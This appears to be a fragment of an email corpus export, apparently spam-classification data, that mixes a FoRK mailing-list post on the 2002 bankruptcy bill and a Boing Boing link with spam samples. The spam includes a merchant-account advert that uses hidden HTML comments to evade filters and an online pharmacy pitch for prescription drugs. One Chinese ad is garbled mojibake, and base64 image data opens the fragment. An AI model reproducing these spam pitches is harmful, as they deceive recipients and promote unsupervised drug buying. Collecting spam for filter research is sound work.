 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
 fQ+0dG78Q7ENPdg+qnyhDeOn/9k=
 --XX9ADB9A99-1A5B9ADBXX--
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: =?GB2312?B?NTDUqrvxtcPSu9LazuXHp83yRU1BSUy12Na3tcS7+rvh?=
</t>
  </si>
  <si>
    <t xml:space="preserve">ã
     ŴŵбǸ뽫ɾ
     Ҫҵվƹ߲ƷϢEMAILӪϵ
     ɱһCNNIC2002µ25%Ŀͻ˽ϢԴΪEMAIL
     EMAILӪΪۺʵõķ
    ȫEMAILַ3йķչƹ㣬Ϊͻṩͬ
     ķ񣬿ͻ鼰20ʡк͵
     ϣԼԶԶ˦ں棬ʱķǵվ
     http://www.chinaemail.net   ϡ
                                                  ȫEMAILַ г
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [NYT] A Sudden Rush to Declare Bankruptcy is Expected
</t>
  </si>
  <si>
    <t xml:space="preserve">Welcome to 2002.  Companies that have taken on way too much debt can
 screw their shareholders and even some of their debt-holders by
 declaring bankruptcy, as Enron and Worldcom have done; meanwhile,
 it becomes more difficult for individuals who have similarly taken on
 too much debt, to dig their way out of their own holes...
 In my next life, I'm coming back as a corporation.  They get all the
 perks. :)
 http://www.nytimes.com/2002/07/27/business/27BANK.html
 A Sudden Rush to Declare Bankruptcy Is Expected
 By PHILIP SHENON
 WASHINGTON, July 26 The compromise bill, which was approved on Thursday
 by Congressional negotiators and is expected to be adopted in both the
 House and Senate by the end of next week, will make it much harder for
 Americans to wipe out their debts when they declare bankruptcy.
 After the agreement, lawyers around the country said that they had begun
 to receive calls and visits from debtors worried that they needed to
 file bankruptcy before the old rules lapse next year.
 "I've had plenty of calls this morning," said Gary F. Weltmann, a
 consumer bankruptcy lawyer in Washington. "And I'm telling people that
 they need to take action now."
 Marty K. Courson, a bankruptcy lawyer in San Francisco, said he was
 "getting ready for the onslaught."
 "I do think there will be a lot of people trying to use the old rules,"
 he said.
 The White House announced today that President Bush would sign the bill,
 which was scheduled for a final vote in the House late tonight and in
 the Senate next week. 
 "The president looks forward to signing that," said Ari Fleischer, the
 White House spokesman. "That bill enjoys widespread bipartisan support
 for good reasons." 
 The bill, which had been stalled until this week in a House-Senate
 conference committee, passed both chambers by overwhelming margins more
 than a year ago. The conference committee approved the bill Thursday
 after agreeing on an abortion-rights provision that had been the final
 obstacle to passage; the provision will bar anti-abortion protesters
 from using the bankruptcy laws to avoid paying court judgments as a
 result of clinic protests.
 The bill has long been the top legislative priority of the credit card
 and banking industries, which say that many people now abuse the
 bankruptcy system by writing off debts that they should be able to
 pay. There were 1.45 million bankruptcy filings last year, a record, up
 19 percent from 2000.
 "This legislation restores integrity and accountability to our
 bankruptcy system by offering a fresh start to those who deserve one
 while cracking down on those who don't," said Representative F. James
 Sensenbrenner Jr., the Wisconsin Republican who is chairman of the House
 Judiciary Committee.
 Critics, including top consumer-rights groups, described the bill as a
 gift to lenders in exchange for a recent, drastic increase in campaign
 contributions to members of Congress. They also said that it would do
 harm to millions of Americans in financial distress as a result of lost
 jobs, poor health or divorce.
 The bill's opponents have also questioned the timing of its passage,
 which comes in the midst of a Congressional crackdown on abusive
 accounting practices by many of the largest companies, including some of
 the same financial services companies that have lobbied strenuously for
 the bankruptcy bill.
 "The timing couldn't be worse," said Travis B. Plunkett, the legislative
 director of the Consumer Federation of America. "It takes a lot of gall
 for Congress to make a move like this when so many Americans are
 concerned about corporate abuses, and when the economy is so shaky." 
 Senator Paul Wellstone, a Minnesota Democrat who is a leading critic of
 the bill, said today that "it boggles the mind that at a time when
 Americans are more economically vulnerable, when they are most in need
 of protection from financial disaster, we would eviscerate the major
 financial safety net in our society for the middle class."
 Bankruptcy lawyers said that the bill would do harm to low- and
 middle-income clients who would be saddled with debts that would take
 them years to pay back. The new law will end the debt-free "fresh start"
 that many of those debtors had been permitted under the current law.
 Recent studies have shown that the average American filing for
 bankruptcy has a median household income well below the national average
 of about $42,000 in 2000. A study cited in Congressional testimony last
 year showed that the average person filing for bankruptcy had a car that
 was six to nine years old, and that a quarter of those people had
 medical debts exceeding $1,000.
 "I won't deny that there are people who abuse the bankruptcy system,"
 said Mr. Weltmann, the Washington lawyer whose firm calls itself the
 Bankruptcy Center. "But there are honest, hard-working folks who are
 really going to be affected by these changes."
 The bill would impose a means test on debtors, based on median incomes
 in their home states, for bankruptcy filings under Charter 7 of the
 federal bankruptcy law, which permits debtors to erase most of their
 unsecured debts, like credit card bills.
 Debtors with an income above the state median would be barred from
 filing under Chapter 7 and would instead be required to file instead
 under Chapter 13, which requires that a portion of the unsecured debt be
 repaid over time under the court-administered plan.
 Mr. Courson, the San Francisco lawyer, said that the changes would "hurt
 a lot of consumer debtors who really, rightfully belong in Chapter 7."
 "My clients, for the most part, are honest and unfortunate people, and
 they've just got heavy debt," he said. "You can always find some
 circumstance where a person really went to town with a credit card and
 got themselves in trouble. But I have people who are just plain old
 poor. My experience is something wildly different than the story that
 the credit card companies make to Congress."
 ----
 aDaM@XeNT.CoM -- .sig double play!
 At its peak, there were more than 100 peer-to-peer start-ups. There now
 remain, at most, a couple of dozen companies concentrated in a few
 niches. The main activity of companies venturing into peer to peer is
 file sharing. But the dozens of overoptimistic forays into alternative
 economic systems, hyper-sophisticated technologies, and recording
 industry collaboration turned out to be dead ends.  Peer-to-peer
 auctions, peer-to-peer supply chain management, and peer-to-peer e-mail
 may have failed because they were ahead of their time. It's more likely
 they failed because they were just ahead of themselves.  Clearly, the
 public's appetite for file sharing has increased, and the state of the
 art has improved dramatically. But companies have still not yet found
 satisfactory business models, thus leaving file sharing's last chapter
 unwritten.
   -- Gene Kan, http://story.news.yahoo.com/news?tmpl=story&amp;u=/zd/20020710/tc_zd/942734
 XML proxies are add-ons to firewall and network environments that have
 the ability to monitor XML traffic and apply business rules and IT
 policies such as security, routing, performance, management,
 transformation, and connection provisioning.  Current firewalls aren't
 able to peek in the envelope and decipher XML traffic, said report
 author Ronald Schmelzer, ZapThink senior analyst.  XML proxies are not
 only able to understand network protocols, but also the XML-based
 content traveling on top of those protocols, Schmelzer said.  ZapThink
 identifies a slew of new vendors with XML-ready security solutions,
 including Flamenco Networks, Forum Systems, Reactivity, Vordel, and
 Westbridge Technology, among others... ZapThink estimates that XML
 represents just 2 percent of network traffic today, but that will
 increase to almost 25 percent by 2006.
   -- http://www.internetwk.com/story/INW20020726S0004
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Easy as 123 - Accept Credit Cards...
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;&lt;head&gt;&lt;meta name="GENERATOR" content="Microsoft FrontPage 5.0"&gt;&lt;meta name="ProgId" content="FrontPage.Editor.Document"&gt;
 &lt;meta http-equiv="Content-Type" content="text/html; charset=windows-1252"&gt;&lt;title&gt;Merchant Account Secrets Revealed&lt;/title&gt;&lt;/head&gt;&lt;body&gt;&lt;DIV class=Section1&gt;
 &lt;P style="MARGIN-LEFT: 0.5in; TEXT-ALIGN: center" align=center&gt;&lt;B&gt;&lt;FONT face="Times New Roman" color=navy size=6&gt;&lt;SPAN style="FONT-WEIGHT: bold; FONT-SIZE: 24pt; COLOR: navy"&gt;TURN BROWSERS INTO BUYERS&lt;/SPAN&gt;&lt;/FONT&gt;&lt;/B&gt;&lt;/P&gt;
 &lt;P style="MARGIN-LEFT: 0.5in; TEXT-ALIGN: center" align=center&gt;&lt;B&gt;&lt;FONT face="Times New Roman" color=red size=6&gt;&lt;SPAN style="FONT-WEIGHT: bold; FONT-SIZE: 24pt; COLOR: red"&gt;GET YOUR MER&lt;!--golly--&gt;CHANT AC&lt;!--golly--&gt;COUNT TODAY!&lt;/SPAN&gt;&lt;/FONT&gt;&lt;/B&gt;&lt;/P&gt;
 &lt;P style="MARGIN-LEFT: 0.5in; TEXT-ALIGN: center" align=center&gt;&lt;B&gt;&lt;FONT face="Comic Sans MS" color=navy size=5&gt;&lt;SPAN style="FONT-WEIGHT: bold; FONT-SIZE: 18pt; COLOR: navy; FONT-FAMILY: 'Comic Sans MS'"&gt;Same Day Approvals &lt;/SPAN&gt;&lt;/FONT&gt;&lt;/B&gt;&lt;/P&gt;
 &lt;P style="MARGIN-LEFT: 0.5in; TEXT-ALIGN: center" align=center&gt;&lt;B&gt;&lt;FONT face="Comic Sans MS" color=blue size=3&gt;&lt;SPAN style="FONT-WEIGHT: bold; FONT-SIZE: 12pt; COLOR: blue; FONT-FAMILY: 'Comic Sans MS'"&gt;VISA * MASTERCARD *&lt;/SPAN&gt;&lt;/FONT&gt;&lt;/B&gt;&lt;FONT color=blue&gt;&lt;SPAN style="COLOR: blue"&gt; &lt;/SPAN&gt;&lt;/FONT&gt;&lt;B&gt;&lt;FONT face="Comic Sans MS" color=blue&gt;&lt;SPAN style="FONT-WEIGHT: bold; COLOR: blue; FONT-FAMILY: 'Comic Sans MS'"&gt;AMERICAN EXPRESS * DISCOVER * ELECTRONIC CHECK&lt;/SPAN&gt;&lt;/FONT&gt;&lt;/B&gt;&lt;/P&gt;
 &lt;P style="MARGIN-LEFT: 0.5in; TEXT-ALIGN: center" align=center&gt;&lt;FONT face="Times New Roman" size=3&gt;&lt;SPAN style="FONT-SIZE: 12pt"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/FONT&gt;&lt;FONT face="Comic Sans MS" size=5&gt;&lt;SPAN style="FONT-SIZE: 18pt; FONT-FAMILY: 'Comic Sans MS'"&gt;&lt;a href="http://81.9.8.29/merchant_account_secrets.html"&gt;Click here to visit our website.&lt;/A&gt;&lt;/SPAN&gt;&lt;/FONT&gt;&lt;/P&gt;
 &lt;P style="MARGIN-LEFT: 0.5in"&gt;&lt;FONT face="Comic Sans MS" color=black size=4&gt;&lt;SPAN style="FONT-SIZE: 13.5pt; COLOR: black; FONT-FAMILY: 'Comic Sans MS'"&gt;It takes less than a minute for you to complete the FREE request form for your merc&lt;!--golly--&gt;hant acc&lt;!--golly--&gt;ount.&lt;/SPAN&gt;&lt;/FONT&gt;&lt;/P&gt;
 &lt;P style="MARGIN-LEFT: 0.5in"&gt;&lt;FONT face="Comic Sans MS" color=black size=4&gt;&lt;SPAN style="FONT-SIZE: 13.5pt; COLOR: black; FONT-FAMILY: 'Comic Sans MS'"&gt;Are you starting a business? Do you already have a business?&lt;/SPAN&gt;&lt;/FONT&gt;&lt;FONT color=black&gt;&lt;SPAN style="COLOR: black"&gt;&lt;/SPAN&gt;&lt;/FONT&gt;&lt;/P&gt;
 &lt;P style="MARGIN-LEFT: 0.5in; TEXT-ALIGN: center" align=center&gt;&lt;B&gt;&lt;FONT face="Times New Roman" color=red size=6&gt;&lt;SPAN style="FONT-WEIGHT: bold; FONT-SIZE: 24pt; COLOR: red"&gt;YOU CAN NOT COMPETE with out accepting credit cards or some sort of payment solution&lt;/SPAN&gt;&lt;/FONT&gt;&lt;/B&gt;&lt;/P&gt;
 &lt;P style="MARGIN-LEFT: 0.5in; TEXT-ALIGN: center" align=center&gt;&lt;B&gt;&lt;FONT face="Times New Roman" color=purple size=6&gt;&lt;SPAN style="FONT-WEIGHT: bold; FONT-SIZE: 24pt; COLOR: purple; FONT-VARIANT: small-caps"&gt;we offer the best programs in the industry!&lt;/SPAN&gt;&lt;/FONT&gt;&lt;/B&gt;&lt;/P&gt;
 &lt;P style="MARGIN-LEFT: 0.5in; TEXT-ALIGN: center" align=center&gt;&lt;FONT face="Comic Sans MS" color=blue size=4&gt;&lt;SPAN style="FONT-SIZE: 13.5pt; COLOR: blue; FONT-FAMILY: 'Comic Sans MS'"&gt;START MAKING MORE MONEY!&lt;/SPAN&gt;&lt;/FONT&gt;&lt;/P&gt;
 &lt;P style="MARGIN-LEFT: 0.5in; TEXT-ALIGN: center" align=center&gt;&lt;FONT face="Comic Sans MS" color=blue size=4&gt;&lt;SPAN style="FONT-SIZE: 13.5pt; COLOR: blue; FONT-FAMILY: 'Comic Sans MS'"&gt;ONLINE, ON THE PHONE, IN YOUR STORE, IN YOUR SHOP,&amp;nbsp; &lt;/SPAN&gt;&lt;/FONT&gt;&lt;/P&gt;
 &lt;P style="MARGIN-LEFT: 0.5in; TEXT-ALIGN: center" align=center&gt;&lt;FONT face="Comic Sans MS" color=blue size=4&gt;&lt;SPAN style="FONT-SIZE: 13.5pt; COLOR: blue; FONT-FAMILY: 'Comic Sans MS'"&gt;FROM YOUR OFFICE OR HOME &lt;/SPAN&gt;&lt;/FONT&gt;&lt;/P&gt;
 &lt;P style="MARGIN-LEFT: 0.5in; TEXT-ALIGN: center" align=center&gt;&lt;FONT face="Comic Sans MS" color=blue size=4&gt;&lt;SPAN style="FONT-SIZE: 13.5pt; COLOR: blue; FONT-FAMILY: 'Comic Sans MS'"&gt;RIGHT AWAY! &lt;/SPAN&gt;&lt;/FONT&gt;&lt;/P&gt;
 &lt;P style="MARGIN-LEFT: 0.5in; TEXT-ALIGN: center" align=center&gt;&lt;FONT face="Times New Roman" size=3&gt;&lt;SPAN style="FONT-SIZE: 12pt"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/FONT&gt;&lt;FONT face="Comic Sans MS" color=#3366ff size=5&gt;&lt;SPAN style="FONT-SIZE: 18pt; COLOR: #3366ff; FONT-FAMILY: 'Comic Sans MS'"&gt;&lt;a href="http://81.9.8.29/merchant_account_secrets.html"&gt;Click Here for the Best Programs Available TODAY!&lt;/a&gt;&lt;/SPAN&gt;&lt;/FONT&gt;&lt;/P&gt;
 &lt;P style="MARGIN-LEFT: 0.5in"&gt;&lt;FONT face="Comic Sans MS" color=navy size=4&gt;&lt;SPAN style="FONT-SIZE: 13.5pt; COLOR: navy; FONT-FAMILY: 'Comic Sans MS'"&gt;You may be paying &lt;SPAN class=GramE&gt;to&lt;/SPAN&gt; much for your existing merchant account. &lt;/SPAN&gt;&lt;/FONT&gt;&lt;FONT face="Comic Sans MS" size=4&gt;&lt;SPAN style="FONT-SIZE: 13.5pt; FONT-FAMILY: 'Comic Sans MS'"&gt;In just one minute you can complete the request form to receive a free statement analysis.&lt;/SPAN&gt;&lt;/FONT&gt;&lt;/P&gt;
 &lt;P style="MARGIN-LEFT: 0.5in"&gt;&lt;FONT face="Times New Roman" size=3&gt;&lt;SPAN style="FONT-SIZE: 12pt"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/FONT&gt;&lt;/P&gt;
 &lt;P style="MARGIN-LEFT: 0.5in; TEXT-ALIGN: center" align=center&gt;&lt;B&gt;&lt;FONT face="Times New Roman" size=3&gt;&lt;SPAN style="FONT-WEIGHT: bold; FONT-SIZE: 12pt"&gt;&amp;nbsp;&amp;nbsp;&lt;/SPAN&gt;&lt;/FONT&gt;&lt;/B&gt;&lt;B&gt;&lt;FONT size=5&gt;&lt;SPAN style="FONT-WEIGHT: bold; FONT-SIZE: 18pt"&gt;&amp;nbsp;&amp;nbsp; &lt;/SPAN&gt;&lt;/FONT&gt;&lt;/B&gt;&lt;B&gt;&lt;FONT color=red size=6&gt;&lt;SPAN style="FONT-WEIGHT: bold; FONT-SIZE: 24pt; COLOR: red"&gt;&amp;nbsp; DON'T WAIT ANOTHER DAY! &lt;/SPAN&gt;&lt;/FONT&gt;&lt;/B&gt;&lt;/P&gt;
 &lt;P style="MARGIN-LEFT: 0.5in; TEXT-ALIGN: center" align=center&gt;&lt;B&gt;&lt;FONT face="Times New Roman" color=red size=5&gt;&lt;SPAN style="FONT-WEIGHT: bold; FONT-SIZE: 18pt; COLOR: red"&gt;&amp;nbsp;INCREASE YOUR SALES BY AS MUCH AS 1000%&lt;/SPAN&gt;&lt;/FONT&gt;&lt;/B&gt;&lt;P&gt;
 &lt;CENTER&gt;----&lt;BR&gt;Save the Planet, Save the Trees! Advertise via E-mail.&lt;BR&gt;No wasted paper!&lt;BR&gt;DELETE WITH ONE SIMPLE KEYSTROKE!&lt;BR&gt;
 &lt;FONT COLOR="Red"&gt;Click &lt;A HREF="mailto:montage@btamail.net.cn?subject=Remove"&gt;Here&lt;/A&gt; To Be Removed.&lt;P&gt;&lt;/FONT&gt;&lt;/CENTER&gt;&lt;/BODY&gt;&lt;/HTML&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: City Planning Funnies
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://boingboing.net/#85534710
 Date: Not supplied
 At the OS X conference, Cory told me about a book called "The Life and Death of 
 the Great American Cities," by Jane Jacobs. This Metropolis Magazine comic 
 strip, by Ben Katchor, seems to resonate with what Cory told me about the book 
 -- that cities die because mixed used areas are changed into single use areas. 
 Link[1] Discuss[2]
 [1] http://metropolismag.com/html/content_1002/ben/ben_a.html
 [2] http://www.quicktopic.com/16/H/uUSrEeEuxYWe
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Complete Online Pharmacy with same day shipping
</t>
  </si>
  <si>
    <t xml:space="preserve"> MERIDIA  is an FDA-approved oral prescription 
  medication that is used for the medical management 
  of obesity, including weight loss and the maintenance 
  of weight loss. MERIDIA can only be prescribed by a 
  licensed medical practictioner.  
  XENICAL, weight loss medication used to help overweight people 
  lose weight and keep this weight off.
   http://www.globalrxco.com/main2.php?rx=16701
  RETIN-A  is used in the treatment of acne as 
  well as to reduce the signs of aging.
   Many other prescription drugs available, including: 
   VIAGRA Less than 7.00 a pill!!!!!!!!!!!!
   VALTREX, Treatement for Herpes. 
   PROPECIA, the first pill that effectively treats male pattern 
   hair loss. 
   ZYBAN, Zyban is the first nicotine-free pill that, as part of a 
   comprehensive program from your health care professional,  
   can help you stop smoking. 
   CLARITIN, provides effective relief from the symptoms of seasonal 
   allergies. 
   And Much More... 
   http://www.globalrxco.com/main2.php?rx=16701
